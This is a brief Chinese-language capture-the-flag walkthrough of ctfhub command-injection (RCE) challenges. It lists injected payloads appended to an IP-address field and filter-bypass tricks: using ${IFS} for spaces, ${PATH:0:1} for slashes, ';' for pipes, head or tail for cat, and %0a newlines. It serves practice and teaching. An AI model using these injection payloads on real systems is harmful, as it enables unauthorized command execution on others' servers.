ctfhub—rce通关记录:
命令注入:
127.0.0.1|ls
127.0.0.1|cat 16257297879221.php
查看源码:
过滤cat:
Less、head、tail都可以替代cat。
127.0.0.1|ls
127.0.0.1|head flag_14394219185779.php
看网页源码:
过滤空格:
可以用${IFS}替代空格。
127.0.0.1|ls
127.0.0.1|cat${IFS}flag_89832133023788.php
查看网页源码:
过滤目录分隔符:
${PATH:0:1}
${HOME:0:1}
cd 切换目录
这些可以用来替换目录分隔符。
127.0.0.1|ls
127.0.0.1|ls flag_is_here
127.0.0.1|cat flag_is_here${PATH:0:1}flag_17525563732150.php
查看网页源码:
过滤运算符
127.0.0.1;ls
127.0.0.1;cat flag_107831345426500.php
查看网页源码:
综合过滤练习
GET请求可以在URL中输入。
换行符的URL编码就是%0a。
ls以_is_here结尾的文件。
查看网页源代码: